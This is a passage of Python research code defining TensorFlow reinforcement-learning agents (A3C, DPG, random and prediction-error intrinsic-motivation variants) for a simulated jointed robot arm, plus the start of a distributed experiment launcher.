self.define_reinforcement_learning()\n\n def define_net_dims(self):\n self.define_model_net_dim()\n self.define_rl_net_dim()\n\n def define_model_net_dim(self):\n raise NotImplementedError(\"This methode must be overwritten\")\n\n def define_rl_net_dim(self):\n raise NotImplementedError(\"This methode must be overwritten\")\n\n def define_replay_buffer(self):\n self.model_buffer = Buffer(shape=(3, 4, self.n_discrete), size=self.model_buffer_size)\n\n def get_model_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds\n\n def to_rl_feed_dict(self, states=None, actions=None, rewards=None):\n # transforms the inputs into a feed dict for the actor\n feed_dict = {}\n if states is not None:\n np_rl_states = np.array(states)\n new_shape = (-1, np.prod(np_rl_states.shape[1:]))\n feed_dict[self.rl_inputs] = np.reshape(np_rl_states, new_shape)\n if actions is not None:\n np_actions = np.array(actions)\n feed_dict[self.actions] = np_actions\n if rewards is not None:\n # reverse pass through the rewards here...\n returns = self.rewards_to_return(rewards)\n feed_dict[self.return_targets_not_bootstraped] = returns\n return feed_dict\n\n def to_model_feed_dict(self, states, next_states=None):\n feed_dict = {}\n np_states = np.array(states)\n feed_dict[self.model_inputs] = np_states\n if next_states is not None:\n feed_dict[self.model_targets] = np.array(next_states)[:, 0]\n return feed_dict\n\n\nclass PEJointAgentWorker(JointAgentWorker):\n def define_model_net_dim(self):\n self.n_discrete = self.env._n_discrete\n self.model_net_dim = [self.n_discrete * 3 * 4, 600, 600, 600, self.n_discrete]\n\n def define_model(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.model_outputs\n # self.rewards\n # self.model_loss\n # self.model_losses\n # self.global_model_step\n # self.model_train_op\n # self.model_summary\n # self.model_summary_at_rl_time --> missing in current ipl, TODO --> useless ?\n # PLACEHOLDERS : ############\n # self.model_inputs\n # self.model_targets\n #############################\n net_dim = self.model_net_dim\n self.model_inputs = tf.placeholder(shape=[None, 3, 4, self.n_discrete], dtype=tf.float32, name=\"model_inputs\")\n self.model_targets = tf.placeholder(shape=[None, 4, self.n_discrete], dtype=tf.float32, name=\"model_targets\")\n splited_model_inputs = [tf.reshape(x, (-1, 3 * self.n_discrete)) for x in tf.unstack(self.model_inputs, 4, axis=2)]\n splited_model_targets = tf.unstack(self.model_targets, 4, axis=1)\n splited_model_outputs = []\n with tf.variable_scope(\"model\"):\n for joint_id, inp in enumerate(splited_model_inputs):\n prev_layer = inp\n for i, d in enumerate(net_dim[1:]):\n activation_fn = lrelu if i < len(net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n splited_model_outputs.append(prev_layer)\n self.model_outputs = tf.stack(splited_model_outputs, axis=1)\n self.model_losses = tf.reduce_mean((self.model_outputs - self.model_targets) ** 2, axis=[-2, -1])\n self.model_loss = tf.reduce_mean(self.model_losses, name=\"loss\")\n self.define_reward(**self.reward_params)\n self.global_model_step = tf.Variable(0, dtype=tf.int32)\n self.global_model_step_inc = self.global_model_step.assign_add(1)\n # optimizer / summary\n self.model_optimizer = tf.train.AdamOptimizer(self.model_lr)\n self.model_train_op = self.model_optimizer.minimize(self.model_loss)\n sum_model_loss = tf.summary.scalar(\"/model/loss\", self.model_losses[0])\n sum_model_reward = tf.summary.scalar(\"/model/reward\", self.rewards[0])\n self.model_summary = tf.summary.merge([sum_model_loss, sum_model_reward])\n sum_model_loss_at_rl = tf.summary.scalar(\"/rl/loss\", self.model_losses[0])\n sum_model_reward_at_rl = tf.summary.scalar(\"/rl/reward\", self.rewards[0])\n self.model_summary_at_rl = tf.summary.merge([sum_model_loss_at_rl, sum_model_reward_at_rl])\n\n\nclass A3CJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4]\n self.critic_remaining_net_dim = [600, 1]\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n constant_gammas = tf.fill(dims=[batch_size], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n prev_layer = self.rl_inputs\n with tf.variable_scope(\"shared\"):\n for i, d in enumerate(self.rl_shared_net_dim[1:]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=lrelu)\n fork_layer = prev_layer\n with tf.variable_scope(\"private_to_critic\"):\n for i, d in enumerate(self.critic_remaining_net_dim):\n activation_fn = lrelu if i < len(self.critic_remaining_net_dim) - 1 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n self.return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * tf.stop_gradient(self.critic_value[-1])\n self.critic_losses = (self.critic_value - self.return_targets) ** 2\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n self.actions = tf.placeholder(shape=[None, self.actor_remaining_net_dim[-1]], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n self.actor_targets = self.return_targets - tf.stop_gradient(self.critic_value)\n targets = tf.expand_dims(self.actor_targets, -1)\n prev_layer = fork_layer\n with tf.variable_scope(\"private_to_actor\"):\n for i, d in enumerate(self.actor_remaining_net_dim[:-1]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i))\n self.greedy_actions = tl.fully_connected(prev_layer, self.actor_remaining_net_dim[-1], activation_fn=None, scope=\"mean_actions\")\n self.log_sigma_2 = tl.fully_connected(prev_layer, self.actor_remaining_net_dim[-1], activation_fn=None, scope=\"log_variance_actions\")\n self.sigma_2 = tf.exp(self.log_sigma_2) + 0.01\n self.sigma = tf.exp(0.5 * self.log_sigma_2) + 0.1\n self.stochastic_actions = tf.random_normal(shape=tf.shape(self.greedy_actions)) * self.sigma + self.greedy_actions\n self.action_applied_in_env = self.stochastic_actions\n self.probs = 1 / (tf.sqrt(2 * pi * self.sigma_2)) * tf.exp(-(self.actions - self.greedy_actions) ** 2 / (2 * self.sigma_2))\n self.log_probs = -0.5 * (log(2 * pi) + self.log_sigma_2 + (self.actions - self.greedy_actions) ** 2 / (self.sigma_2))\n self.entropy = 0.5 * (1 + log(2 * pi) + self.log_sigma_2)\n self.entropy_mean = tf.reduce_mean(self.entropy, name=\"entropy_mean\")\n # self.actor_losses = -self.log_probs * targets - self.entropy_coef * self.entropy\n self.actor_losses = -self.log_probs * targets\n self.actor_loss = tf.reduce_sum(self.actor_losses, name=\"loss\")\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n self.critic_optimizer = tf.train.AdamOptimizer(5e-4)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = self.critic_optimizer.minimize(self.critic_loss)\n self.rl_optimizer = tf.train.AdamOptimizer(5e-4)\n self.rl_train_op = self.rl_optimizer.minimize(0.000001 * self.actor_loss + self.critic_loss)\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n mean_summaries, std_summaries = [], []\n for i, name in zip(range(4), names):\n mean_summary = tf.summary.scalar(\"joints/{}_mean\".format(name), self.greedy_actions[0, i])\n mean_summaries.append(mean_summary)\n std_summary = tf.summary.scalar(\"joints/{}_std\".format(name), self.sigma[0, i])\n std_summaries.append(std_summary)\n per_joint_summaries = mean_summaries + std_summaries\n actor_loss_summary = tf.summary.scalar(\"/rl/actor_loss\", tf.reduce_mean(self.actor_losses))\n critic_loss_summary = tf.summary.scalar(\"/rl/critic_loss\", self.critic_losses[0])\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((self.return_targets - tf.reduce_mean(self.return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n self.rl_summary = tf.summary.merge([\n actor_loss_summary,\n critic_loss_summary,\n sum_critic_quality] + per_joint_summaries)\n\n\nclass DiscreteA3CJointAgentWorker(JointAgentWorker):\n def __init__(self, task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size, entropy_coef):\n self.entropy_coef = entropy_coef\n super().__init__(task_index, pipe, env, cluster, logdir, discount_factor, sequence_length, reward_params,\n model_lr, critic_lr, actor_lr, model_buffer_size)\n\n\n def define_rl_net_dim(self):\n self.n_actions = 30\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4 * self.n_actions]\n self.critic_remaining_net_dim = [600, 1]\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n batch_size_64 = tf.cast(batch_size, tf.int64)\n constant_gammas = tf.fill(dims=[batch_size], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n prev_layer = self.rl_inputs\n with tf.variable_scope(\"shared\"):\n for i, d in enumerate(self.rl_shared_net_dim[1:]):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=lrelu)\n fork_layer = prev_layer\n with tf.variable_scope(\"private_to_critic\"):\n for i, d in enumerate(self.critic_remaining_net_dim):\n activation_fn = lrelu if i < len(self.critic_remaining_net_dim) - 1 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n self.return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * tf.stop_gradient(self.critic_value[-1])\n self.critic_losses = (self.critic_value - self.return_targets) ** 2\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n bounds = np.array([2.34, 2.34, 3.14, 3.14], dtype=np.float32)\n vals = [tf.linspace(-b, b, self.n_actions) for b in bounds]\n action_values = tf.stack(vals, axis=0)\n self.actions = tf.placeholder(shape=[None, 4], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n b = tf.constant(bounds)\n self.actions_indices = tf.cast(tf.floor(((self.actions + b) / (2 * b)) * (self.n_actions - 1) + 0.5), tf.int32)\n self.actor_targets = self.return_targets - tf.stop_gradient(self.critic_value)\n targets = tf.expand_dims(self.actor_targets, -1)\n prev_layer = fork_layer\n with tf.variable_scope(\"private_to_actor\"):\n for i, d in enumerate(self.actor_remaining_net_dim):\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i))\n\n self.logits = tf.reshape(prev_layer, (-1, 4, self.n_actions)) # [BS, 4, NA]\n # self.logits = 1000 * tf.tanh(self.logits / 1000)\n # self.probs = tf.nn.softmax(self.logits, axis=-1) + 1 / (20 * self.n_actions) # [BS, 4, NA]\n # self.dist = tf.distributions.Categorical(probs=self.probs)\n self.dist = tf.distributions.Categorical(logits=self.logits)\n self.log_picked_probs = self.dist.log_prob(self.actions_indices) # [BS, 4]\n self.picked_probs = self.dist.prob(self.actions_indices) # [BS, 4]\n self.greedy_actions_indices = tf.argmax(self.logits, axis=-1) # [BS, 4]\n self.greedy_actions = tf.cast(self.greedy_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds\n self.stochastic_actions_indices = self.dist.sample()\n self.stochastic_actions = tf.cast(self.stochastic_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds # [BS, 4]\n\n self.action_applied_in_env = self.stochastic_actions\n self.entropy = self.dist.entropy()\n self.entropy_mean = tf.reduce_mean(self.entropy, name=\"entropy_mean\")\n # self.entropy_coef = 0.01\n self.actor_losses = -tf.maximum(self.log_picked_probs, -4) * targets - self.entropy_coef * self.entropy\n self.actor_loss = tf.reduce_sum(self.actor_losses, name=\"loss\")\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n self.critic_optimizer = tf.train.AdamOptimizer(self.critic_lr)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = self.critic_optimizer.minimize(self.critic_loss)\n self.rl_optimizer = tf.train.AdamOptimizer(self.actor_lr)\n self.rl_train_op = self.rl_optimizer.minimize(self.actor_loss + self.critic_loss)\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n pos_summaries, prob_summaries = [], []\n for i, name in zip(range(4), names):\n pos_summary = tf.summary.scalar(\"joints/{}_pos\".format(name), self.stochastic_actions[0, i])\n pos_summaries.append(pos_summary)\n prob_summary = tf.summary.scalar(\"joints/{}_prob\".format(name), self.picked_probs[0, i])\n prob_summaries.append(prob_summary)\n per_joint_summaries = pos_summaries + prob_summaries\n max_logits_summary = tf.summary.scalar(\"/rl/max_logits\", tf.reduce_max(self.logits))\n entropy_summary = tf.summary.scalar(\"/rl/entropy\", self.entropy_mean)\n actor_loss_summary = tf.summary.scalar(\"/rl/actor_loss\", tf.reduce_mean(self.actor_losses))\n critic_loss_summary = tf.summary.scalar(\"/rl/critic_loss\", self.critic_losses[0])\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((self.return_targets - tf.reduce_mean(self.return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n self.rl_summary = tf.summary.merge([\n max_logits_summary,\n entropy_summary,\n actor_loss_summary,\n critic_loss_summary,\n sum_critic_quality] + per_joint_summaries)\n\n\nclass DiscreteRandomJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.n_actions = 30\n self.rl_shared_net_dim = [self.n_discrete * 4 * 3]\n self.actor_remaining_net_dim = [600, 4 * self.n_actions]\n self.critic_remaining_net_dim = [600, 1]\n\n def get_rl_state(self):\n return self.env.discrete_positions, self.env.discrete_speeds, self.env.discrete_target_positions\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n bounds = np.array([2.34, 2.34, 3.14, 3.14], dtype=np.float32)\n net_dim = self.rl_shared_net_dim\n self.rl_inputs = tf.placeholder(shape=[None, net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n batch_size = tf.shape(self.rl_inputs)[0]\n self.critic_value = tf.zeros_like(self.return_targets_not_bootstraped)\n self.critic_losses = tf.zeros_like(self.return_targets_not_bootstraped)\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"loss\")\n self.actions = tf.placeholder(shape=[None, 4], dtype=tf.float32, name=\"actor_picked_actions\") # picked actions\n # self.dist = tf.distributions.Categorical(probs=tf.constant([[[1.0] * self.n_actions] * 4]))\n self.dist = tf.distributions.Categorical(probs=tf.ones(shape=[batch_size, 4, self.n_actions], dtype=tf.float32))\n self.stochastic_actions_indices = self.dist.sample()\n self.stochastic_actions = tf.cast(self.stochastic_actions_indices, tf.float32) * 2 * bounds / (float(self.n_actions) - 1.0) - bounds # [BS, 4]\n self.greedy_actions = self.stochastic_actions\n self.action_applied_in_env = self.stochastic_actions\n self.actor_loss = tf.constant(0.0)\n self.critic_loss = tf.constant(0.0)\n # optimizer / summary\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n # self.critic_optimizer = tf.train.AdamOptimizer(1e-3)\n self.critic_train_op = tf.no_op()\n self.rl_train_op = tf.no_op()\n # summaries\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n pos_summaries, prob_summaries = [], []\n for i, name in zip(range(4), names):\n pos_summary = tf.summary.scalar(\"joints/{}_pos\".format(name), self.stochastic_actions[0, i])\n pos_summaries.append(pos_summary)\n per_joint_summaries = pos_summaries\n self.rl_summary = tf.summary.merge(per_joint_summaries)\n\n\nclass DPGJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.critic_net_dim = [4 + self.n_discrete * 4 * 2, 600, 1]\n self.actor_net_dim = [self.n_discrete * 2 * 4, 600, 4]\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n self.rl_inputs = tf.placeholder(shape=[None, self.actor_net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n self.actions = tf.placeholder(shape=[None, self.actor_net_dim[-1]], dtype=tf.float32, name=\"actions\")\n with tf.variable_scope(\"actor_net\"):\n prev_layer = self.rl_inputs\n for i, d in enumerate(self.actor_net_dim[1:]):\n activation_fn = lrelu if i < len(self.actor_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.greedy_actions = prev_layer * 10\n self.stochastic_actions = self.greedy_actions + tf.random_normal(shape=tf.shape(self.greedy_actions), stddev=0.1)\n self.action_applied_in_env = self.greedy_actions\n actor_vars = [x for x in tf.global_variables() if x.name.startswith(\"actor_net\")]\n with tf.variable_scope(\"critic_net\"):\n prev_layer = tf.concat([self.rl_inputs, self.actions], axis=1)\n for i, d in enumerate(self.critic_net_dim[1:]):\n activation_fn = lrelu if i < len(self.critic_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value_from_phd = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n with tf.variable_scope(\"critic_net\"):\n prev_layer = tf.concat([self.rl_inputs, self.greedy_actions], axis=1) # could also add noise (see stochastic)\n for i, d in enumerate(self.critic_net_dim[1:]):\n activation_fn = lrelu if i < len(self.critic_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn, reuse=True)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n # losses\n constant_gammas = tf.fill(dims=[tf.shape(self.rl_inputs)[0]], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * self.critic_value_from_phd[-1]\n self.critic_losses = (return_targets - self.critic_value_from_phd) ** 2 # * (1 - increasing_discounted_gammas)\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"critic_loss\")\n self.actor_loss = -tf.reduce_mean(self.critic_value)\n # train ops\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n with tf.control_dependencies([self.global_rl_step_inc]):\n self.critic_train_op = tf.train.AdamOptimizer(self.critic_lr).minimize(self.critic_loss)\n self.actor_train_op = tf.train.AdamOptimizer(self.actor_lr).minimize(self.actor_loss, var_list=actor_vars)\n with tf.control_dependencies([self.critic_train_op]):\n with tf.control_dependencies([self.actor_train_op]):\n self.rl_train_op = tf.no_op()\n # summaries\n sum_actor_loss = tf.summary.scalar(\"/rl/actor_loss\", tf.clip_by_value(-self.critic_value[0], -20, 20))\n sum_critic_loss = tf.summary.scalar(\"/rl/critic_loss\", tf.clip_by_value(self.critic_losses[0], -20, 20))\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((return_targets - tf.reduce_mean(return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n grad = tf.gradients(self.critic_value, self.greedy_actions)[0]\n action_summaries, grad_summaries = [], []\n for i, name in zip(range(4), names):\n action_summary = tf.summary.scalar(\"joints/{}\".format(name), self.greedy_actions[0, i])\n action_summaries.append(action_summary)\n grad_summary = tf.summary.scalar(\"joints/{}_grad\".format(name), grad[0, i])\n grad_summaries.append(grad_summary)\n self.rl_summary = tf.summary.merge([sum_actor_loss, sum_critic_loss, sum_critic_quality, grad_summaries, action_summaries])\n\n\nclass PEEJointAgentWorker(JointAgentWorker):\n def define_model_net_dim(self):\n self.n_discrete = self.env._n_discrete\n self.model_net_dim = [self.n_discrete * 3 * 4, 600, 600, 600, self.n_discrete]\n self.pee_model_net_dim = [self.n_discrete * 3 * 4, 600, 1]\n\n def define_model(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.model_outputs\n # self.rewards\n # self.model_loss\n # self.model_losses\n # self.global_model_step\n # self.model_train_op\n # self.model_summary\n # self.model_summary_at_rl_time --> missing in current ipl, TODO --> useless ?\n # PLACEHOLDERS : ############\n # self.model_inputs\n # self.model_targets\n #############################\n net_dim = self.model_net_dim\n self.model_inputs = tf.placeholder(shape=[None, 3, 4, self.n_discrete], dtype=tf.float32, name=\"model_inputs\")\n self.model_targets = tf.placeholder(shape=[None, 4, self.n_discrete], dtype=tf.float32, name=\"model_targets\")\n splited_model_inputs = [tf.reshape(x, (-1, 3 * self.n_discrete)) for x in tf.unstack(self.model_inputs, 4, axis=2)]\n splited_model_targets = tf.unstack(self.model_targets, 4, axis=1)\n splited_model_outputs = []\n with tf.variable_scope(\"model\"):\n for joint_id, inp in enumerate(splited_model_inputs):\n prev_layer = inp\n for i, d in enumerate(net_dim[1:]):\n activation_fn = lrelu if i < len(net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n splited_model_outputs.append(prev_layer)\n net_dim = self.pee_model_net_dim\n splited_pee_model_outputs = []\n with tf.variable_scope(\"pee_model\"):\n for joint_id, inp in enumerate(splited_model_inputs):\n prev_layer = inp\n for i, d in enumerate(net_dim[1:]):\n activation_fn = lrelu if i < len(net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n splited_pee_model_outputs.append(prev_layer)\n\n self.pee_model_outputs = tf.concat(splited_pee_model_outputs, axis=1) # [BS, 4]\n self.model_outputs = tf.stack(splited_model_outputs, axis=1) # [BS, 4, ND]\n per_joint_model_losses = tf.reduce_mean((self.model_outputs - self.model_targets) ** 2, axis=-1) # [BS, 4]\n self.model_losses = tf.reduce_mean(per_joint_model_losses, axis=-1) # [BS]\n self.model_loss = tf.reduce_mean(self.model_losses, name=\"loss\") # []\n self.pee_model_losses = tf.reduce_mean((normalize(tf.stop_gradient(per_joint_model_losses), 0.95) - self.pee_model_outputs) ** 2, axis=-1) # [BS]\n self.pee_model_loss = tf.reduce_mean(self.pee_model_losses, name=\"pee_loss\") # []\n self.define_reward(**self.reward_params)\n self.global_model_step = tf.Variable(0, dtype=tf.int32)\n self.global_model_step_inc = self.global_model_step.assign_add(1)\n # optimizer / summary\n self.model_optimizer = tf.train.AdamOptimizer(self.model_lr)\n self.model_train_op = self.model_optimizer.minimize(self.model_loss + self.pee_model_loss)\n sum_model_loss = tf.summary.scalar(\"/model/loss\", self.model_losses[0])\n sum_model_pee_loss = tf.summary.scalar(\"/model/pee_loss\", self.pee_model_losses[0])\n sum_model_reward = tf.summary.scalar(\"/model/reward\", self.rewards[0])\n self.model_summary = tf.summary.merge([sum_model_loss, sum_model_reward, sum_model_pee_loss])\n sum_model_loss_at_rl = tf.summary.scalar(\"/rl/loss\", self.model_losses[0])\n sum_model_pee_loss_at_rl = tf.summary.scalar(\"/rl/pee_loss\", self.pee_model_losses[0])\n sum_model_reward_at_rl = tf.summary.scalar(\"/rl/reward\", self.rewards[0])\n self.model_summary_at_rl = tf.summary.merge([sum_model_loss_at_rl, sum_model_reward_at_rl, sum_model_pee_loss_at_rl])\n\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / pee_model_loss_converges_to\n # self.rewards = reward_scale * self.pee_model_losses\n self.rewards = normalize(self.pee_model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MinimizeJointAgentWorker(PEJointAgentWorker):\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / model_loss_converges_to\n # self.rewards = - reward_scale * self.model_losses\n self.rewards = - normalize(self.model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MaximizeJointAgentWorker(PEJointAgentWorker):\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / model_loss_converges_to\n # self.rewards = reward_scale * self.model_losses\n self.rewards = normalize(self.model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MaximizeSparseJointAgentWorker(PEJointAgentWorker):\n # def define_reward(self, percent):\n # normalized_model_losses = normalize(self.model_losses, 0.95)\n # scale = np.sqrt(2) * special.erfcinv(2 * percent / 100)\n # self.rewards = tf.floor(normalized_model_losses / scale) * tf.sqrt(1 - self.discount_factor ** 2)\n\n def define_reward(self, limit):\n normalized_model_losses = normalize(self.model_losses, 0.95)\n self.rewards = tf.where(normalized_model_losses > limit,\n tf.ones_like(normalized_model_losses),\n tf.ones_like(normalized_model_losses) * (self.discount_factor - 1))\n # self.rewards = tf.sigmoid((normalized_model_losses - limit))\n\n\nclass TargetErrorJointAgentWorker(PEJointAgentWorker):\n def define_reward(self, target_prediction_error):\n # self.rewards = -tf.abs(self.model_losses - target_prediction_error) * (1 - self.discount_factor) / 0.004\n deviation = tf.abs(self.model_losses - target_prediction_error)\n self.rewards = - normalize(deviation, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass RangeErrorJointAgentWorker(PEJointAgentWorker):\n def define_reward(self, range_mini, range_maxi):\n mean = (range_maxi + range_mini) / 2\n dist = (range_maxi - range_mini) / 2\n self.rewards = normalize(-tf.nn.relu(-(dist - tf.abs(self.model_losses - mean))), 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass Experiment:\n def __init__(self, n_parameter_servers, n_workers, WorkerCls, experiment_dir, args_env, args_worker, display_dpi=3):\n lock = filelock.FileLock(\"/home/wilmot/Documents/code/intrinsic_motivations_box2d/experiments/lock\")\n lock.acquire()\n self.n_parameter_servers = n_parameter_servers\n self.n_workers = n_workers\n self.WorkerCls = WorkerCls\n self.experiment_dir = experiment_dir\n self.mktree()\n self.cluster = get_cluster(n_parameter_servers, n_workers)\n self.args_env, self.args_worker = args_env, list(args_worker)\n self.args_worker = [self.cluster, self.logdir] + self.args_worker\n self.args_env_display = list(args_env)\n self.args_env_display[5] = display_dpi\n pipes = [multiprocessing.Pipe(True) for i in range(n_workers)]\n self.here_pipes = [a for a, b in pipes]\n self.there_pipes = [b for a, b in pipes]\n self.here_worker_pipes = [a for a, b in pipes]\n self.here_display_pipes = []\n ### DEFINE PROCESSES ###\n self.tensorboard_process = None\n self.chromium_process = None\n self.parameter_servers_processes = [multiprocessing.Process(\n target=self.parameter_server_func,\n args=(i,),\n daemon=True)\n for i in range(self.n_parameter_servers)]\n self.workers_processes = [multiprocessing.Process(\n target=self.worker_func,\n args=(i,),\n daemon=True)\n for i in range(self.n_workers)]\n ### start all processes ###\n all_processes = self.parameter_servers_processes + self.workers_processes\n for p in all_processes:\n p.start()\n time.sleep(5)\n lock.release()\n\n def mktree(self):\n self.logdir = self.experiment_dir + \"/log\"\n self.checkpointsdir = self.experiment_dir + \"/checkpoints\"\n self.videodir = self.experiment_dir + \"/video\"\n os.mkdir(self.experiment_dir)\n os.mkdir(self.logdir)\n os.mkdir(self.videodir)\n os.mkdir(self.checkpointsdir)\n\n def parameter_server_func(self, task_index):\n server = tf.train.Server(self.cluster, \"ps\", task_index)\n server.join()\n\n def worker_func(self, task_index):\n env = 